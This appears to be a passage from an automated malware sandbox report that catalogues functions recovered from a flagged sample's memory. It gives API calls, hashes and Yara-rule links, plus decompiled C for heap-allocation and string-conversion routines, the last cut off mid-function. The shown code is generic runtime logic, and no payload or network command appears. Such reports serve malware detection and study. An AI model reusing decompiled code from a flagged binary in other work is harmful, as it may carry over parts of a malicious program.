            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: fa079afb5efe218a8bccd1bb420b4a0e645997d38fb85104f034c0f55a196efd
            • Instruction ID: 4327a54f72539564820d4f5d13e2f280521628f60c34caf0eae25929758ea437
            • Opcode Fuzzy Hash: fa079afb5efe218a8bccd1bb420b4a0e645997d38fb85104f034c0f55a196efd
            • Instruction Fuzzy Hash: 0A4190B1D003499FDF14CF99D884ADEFBB5BF48314F24812AE819AB214D775A945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C45F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 6605d623bcd3116e1aafb2ee7c44a7a37261191e24a15e130d800fdd390a1dc1
            • Instruction ID: 247671a2dbaa8c8446070a944979191e23c594169cab77571c97271dc12ccd0a
            • Opcode Fuzzy Hash: 6605d623bcd3116e1aafb2ee7c44a7a37261191e24a15e130d800fdd390a1dc1
            • Instruction Fuzzy Hash: 804123B1C08758CFDB24DFA9C884BCDBBB1BF59304F2480AAD408AB255D7B55946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: edbbf765597c41bbfbb12a288f305f550e8141fbdffca81f77f5a7b8b90d1398
            • Instruction ID: 569e092a97a5f362a03b93dca3ef8bfe13c33a154acc99d9fee5e0d8d9a1fe06
            • Opcode Fuzzy Hash: edbbf765597c41bbfbb12a288f305f550e8141fbdffca81f77f5a7b8b90d1398
            • Instruction Fuzzy Hash: 104110B1C08758CBDB24DFA9C884BCEBBB5BF59304F20806AD408AB251D7B56945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
            Download Yara Rule
            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C2531
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: e7368f215ccd9937b889ea286537d6ec918741f52c5e5c309478c78becc4fd2e
            • Instruction ID: 4842641fea0aacf0aae6d63800cb9497ac9db4345c293f5c75a0e06d1441970d
            • Opcode Fuzzy Hash: e7368f215ccd9937b889ea286537d6ec918741f52c5e5c309478c78becc4fd2e
            • Instruction Fuzzy Hash: C6411AB8A003058FDB14CF99C448BAAFBF6FB98314F158599D559AB321D375A841CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CB889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 5410e0fe664d461db42535c812960a2a1b5c4d4b0244170e2a088e107211bda5
            • Instruction ID: 8df5cbfe3818f07e133259d668d247babdb0f1536c571cea2f5f5c933431141a
            • Opcode Fuzzy Hash: 5410e0fe664d461db42535c812960a2a1b5c4d4b0244170e2a088e107211bda5
            • Instruction Fuzzy Hash: 94318C72908289AFDB118FA9D841BDEBFF4EF19210F05805AE954AB222C3359954DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05396273, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05396320
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 46fce49ae8b330ac661a4617dc5f17572f5ad147a7d0fed3e56f098b5114addd
            • Instruction ID: 81effdf9649889e751a3f48602a75a675f67312fb0089c948ca4af311379d6c4
            • Opcode Fuzzy Hash: 46fce49ae8b330ac661a4617dc5f17572f5ad147a7d0fed3e56f098b5114addd
            • Instruction Fuzzy Hash: 8A2177B59043488FCB10DF99D445B9EBBF8BF59310F14816AE858AB251C739A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 51f46cc2d8b644995b4470c00d0b6a539941d6bda12f9716b0d962513f2eb52a
            • Instruction ID: ab7e195f0e51a07c2371cf00f8250d37355cae4e6cdbdab4cca39c54380c61c1
            • Opcode Fuzzy Hash: 51f46cc2d8b644995b4470c00d0b6a539941d6bda12f9716b0d962513f2eb52a
            • Instruction Fuzzy Hash: 9721B0B5D002489FDB10CFA9E584BDEFBF4FB48314F15852AE958A7210C378A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: d76c49b542577ae6b2a33b85bf41ed78e9c34859c5c8020711c3d1e018daf35b
            • Instruction ID: 4001263064332e13961dcbcd28f5e7b2715e5d14da2638d04192ee5c25841f22
            • Opcode Fuzzy Hash: d76c49b542577ae6b2a33b85bf41ed78e9c34859c5c8020711c3d1e018daf35b
            • Instruction Fuzzy Hash: 8F21B3B59002489FDB10CFA9D484ADEFBF8FB48314F14852AE958A7210D378A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04998768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: e023a99f2e45f34629ea7bbf69cf7ff7a2e2c0335fdb6ad4b50959586efba1a4
            • Instruction ID: 6c62a678d5d619eacb548b176b31991ea45e65441626a6d398127fa8fb1cefae
            • Opcode Fuzzy Hash: e023a99f2e45f34629ea7bbf69cf7ff7a2e2c0335fdb6ad4b50959586efba1a4
            • Instruction Fuzzy Hash: 9011F2B59042498FDB10CF9AD444BDEFBF8AB48314F14852EE919A7700C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04999849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: a487b2fc840e327360ccfa74b8d1f92e334548ff4fd52c41e84bc6d888d33b37
            • Instruction ID: 5ee8cf66b7aec557cb909a9dcf194760e29e1c69315f93348ca5d44877000987
            • Opcode Fuzzy Hash: a487b2fc840e327360ccfa74b8d1f92e334548ff4fd52c41e84bc6d888d33b37
            • Instruction Fuzzy Hash: 1A1114B6D002498FDB10CF9AD444BDEFBF4AB88314F15852ED419A7700C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 819308d68ac88987386edc03baa0eb71ac48fe6c7bcc3bd3b1d1b527716a45e7
            • Instruction ID: 810016a21104419282d38171e395f99cac2ddf6309f28c69f656504d7fb601e5
            • Opcode Fuzzy Hash: 819308d68ac88987386edc03baa0eb71ac48fe6c7bcc3bd3b1d1b527716a45e7
            • Instruction Fuzzy Hash: AE1137B5804249DFDB10CFA9D844BDEBFF8EF58314F14841AE954A7210C379A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 83cd24eeeea508939ed2ebebab1ce9bc04a21c38138dcbc4ca31a5c6d773f5a0
            • Instruction ID: b89184e4a9098b5ed9f5cb4aa377f92df1503be80192c63fc9e6f265fe02cea4
            • Opcode Fuzzy Hash: 83cd24eeeea508939ed2ebebab1ce9bc04a21c38138dcbc4ca31a5c6d773f5a0
            • Instruction Fuzzy Hash: 9A1146B58003499FDB10CF99C445BEEFBF8EB48314F10846AE954A3200C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CE6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 68b40dff6cb660e12a56a06acfd0184bff112df614eb2e30cc6721334cff2fb5
            • Instruction ID: cac54eec24af736bbb7525c1729239b42f817b244334832b00898d21f862be79
            • Opcode Fuzzy Hash: 68b40dff6cb660e12a56a06acfd0184bff112df614eb2e30cc6721334cff2fb5
            • Instruction Fuzzy Hash: 981134B58003499FDB10CF99C885BDEBFF8EB48314F14845AE858A3201C379A544CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 053962C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05396320
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: ed8a85211a8f5a43a4a6a6b4c6e7e4d3736bbfa0d8a0447ee3b9d1514ddf9a24
            • Instruction ID: fc548c7b9597e412936f0daa1a4ccd1013fce61aa719b06cf38d3d3af5b2954e
            • Opcode Fuzzy Hash: ed8a85211a8f5a43a4a6a6b4c6e7e4d3736bbfa0d8a0447ee3b9d1514ddf9a24
            • Instruction Fuzzy Hash: 161133B58002498FDB20CF99D485BDEFBF4EB48324F14842AD969A7240C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 049995C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 4bf98459cc1af584463b72bb13542caf677a4e3918758c780453eb2d1f901286
            • Instruction ID: 1227a7397e5ed90c0b955314657265927e109e20c84f33c5ba561556d65ac892
            • Opcode Fuzzy Hash: 4bf98459cc1af584463b72bb13542caf677a4e3918758c780453eb2d1f901286
            • Instruction Fuzzy Hash: 6F11DFB5D006498FDB20CF9AD444BDEFBF8AB88314F15852AD829A7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: fe370c34fcceb9914d01b1e8f28261e3e9edd1ffd0c30360bd30d80ce7ebc2ee
            • Instruction ID: 01c215feb84491ae7be7bedfe535f39198e2a83348454f99d3bf3391db63d837
            • Opcode Fuzzy Hash: fe370c34fcceb9914d01b1e8f28261e3e9edd1ffd0c30360bd30d80ce7ebc2ee
            • Instruction Fuzzy Hash: 901110B5804348DFDB20CF99C485BDEBBF8EB48314F10885AE958A7600C375A940CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: a57722e5aa676c7083d089a730636ca1cc995a189a57fd0f136893cf52eca891
            • Instruction ID: c36688a963a31c3d7b5a1fd1ed2798c706d5636d5f08f06cd255e36b97b5f605
            • Opcode Fuzzy Hash: a57722e5aa676c7083d089a730636ca1cc995a189a57fd0f136893cf52eca891
            • Instruction Fuzzy Hash: F511E0B58003489FDB20CF99D884BEEFFF8EB58314F14855AE969A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: b74a1b216dd830d639d4ee87113f2bbf58c6b03a8a5e3bd05664c86dceeff4f4
            • Instruction ID: dedf07d23e0baf60c170b54d4ed65374ab4b10cc79ef9abd486c9827549684ea
            • Opcode Fuzzy Hash: b74a1b216dd830d639d4ee87113f2bbf58c6b03a8a5e3bd05664c86dceeff4f4
            • Instruction Fuzzy Hash: 1C11E3B58043489FDB20CF99D544BDEFBF8EB58314F10846AE959B7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CD238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 8219200bc4b921c8e9be97c3f85e58dd09a63fc758d603c7c452db0a12092b31
            • Instruction ID: c1c3d2a0be5c638b19ca3553d73d78c4204b86fe7475eb220a12855d568ede18
            • Opcode Fuzzy Hash: 8219200bc4b921c8e9be97c3f85e58dd09a63fc758d603c7c452db0a12092b31
            • Instruction Fuzzy Hash: 191113B58003889FDB10CF99D484BDEBFF8EB48310F10841AE859A7600C375A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05390438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: efe950e76edbe80d65c5327d68ef709f07f3e5285938bf8240a2e408f43b5db3
            • Instruction ID: ae765a344d1102cde867b0f4c95c7d4a94adc36c04ce992d48515acae3eee3be
            • Opcode Fuzzy Hash: efe950e76edbe80d65c5327d68ef709f07f3e5285938bf8240a2e408f43b5db3
            • Instruction Fuzzy Hash: 8311F2B5C047898FDB14CF9AD448BDEFBF4EB48314F14852AE869A7600D378A544CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 563209c8330cedab167305ccc6707a3f2b4e0d2ba4d4e3b5302ee8ca221a3b00
            • Instruction ID: f769714638053c92532673239a3b1c5a99977baa19fda3375f49bcea17559e83
            • Opcode Fuzzy Hash: 563209c8330cedab167305ccc6707a3f2b4e0d2ba4d4e3b5302ee8ca221a3b00
            • Instruction Fuzzy Hash: A51103B58003499FDB10CF99D585BDEFBF8EB48324F24852AD859A7601C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CC3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 468bfb909512da137b0f52238942b847688583d16aafd759250f3e87ba7e44c8
            • Instruction ID: 9b7e8db45cd8c0361ffdfb9565c6c7e8dd472552ff84d697b6af22b636e56ce2
            • Opcode Fuzzy Hash: 468bfb909512da137b0f52238942b847688583d16aafd759250f3e87ba7e44c8
            • Instruction Fuzzy Hash: 9611F2B58003489FDB10CF99D485BDEFFF8EB58324F14845AE868A7601C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0499FE9D
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: eb06e3399325958f2fd87a79e05707537fcc057c1e8804c55d1de562bec2624d
            • Instruction ID: 0ee426aedaf3628791c9a15e952071c9730b367e2aa0880eaa5b392b0d2665be
            • Opcode Fuzzy Hash: eb06e3399325958f2fd87a79e05707537fcc057c1e8804c55d1de562bec2624d
            • Instruction Fuzzy Hash: 391100B58002498FDB10CF9AD488BDEFBF8EB48324F14852AE818A7200C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05390440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: bee99720c869aa5acfab36cd32f397f1b7a18b5ed909f57d69c4ea1abd240d2a
            • Instruction ID: 1b7809e232397084f44f31bc69c12a35ec85f0d4fb84a0e60247928ac84bfeb6
            • Opcode Fuzzy Hash: bee99720c869aa5acfab36cd32f397f1b7a18b5ed909f57d69c4ea1abd240d2a
            • Instruction Fuzzy Hash: 091100B4C046498FCB14CF9AD448BCEFBF4EB48314F10852AE829A3200C378A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CBC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 061809a345782d5b53008d230f99b04a7eb46b20f046340a8605bcb5e3010742
            • Instruction ID: 091e8d50604723e2627cbf5f3ffafdfa06938a5ca63fdd6ad562744167e3fc46
            • Opcode Fuzzy Hash: 061809a345782d5b53008d230f99b04a7eb46b20f046340a8605bcb5e3010742
            • Instruction Fuzzy Hash: 0111F2B98042488FDB10CF99D585BDEBFF8EB48314F14885AE558A7600C375A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403ECE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4132b0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00403829();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00404831())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E004068FD(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









            0x00403ece
            0x00403ed4
            0x00403ed9
            0x00403ee7
            0x00403ee7
            0x00403eed
            0x00403eef
            0x00403eef
            0x00403f06
            0x00403f0f
            0x00403f17
            0x00000000
            0x00000000
            0x00403ef7
            0x00403ef9
            0x00403f1b
            0x00403f20
            0x00403f26
            0x00000000
            0x00403f26
            0x00403efc
            0x00403f01
            0x00403f02
            0x00403f04
            0x00000000
            0x00000000
            0x00403f04
            0x00000000
            0x00403f06
            0x00403edf
            0x00403ee5
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
            • Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
            • Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
            • Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







            0x00403e3d
            0x00403e43
            0x00403e49
            0x00403e7b
            0x00403e80
            0x00403e86
            0x00000000
            0x00403e86
            0x00403e4d
            0x00403e4f
            0x00403e4f
            0x00403e66
            0x00403e6f
            0x00403e77
            0x00000000
            0x00000000
            0x00403e57
            0x00403e59
            0x00000000
            0x00000000
            0x00403e5c
            0x00403e61
            0x00403e62
            0x00403e64
            0x00000000
            0x00000000
            0x00403e64
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x9c4b7b95
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
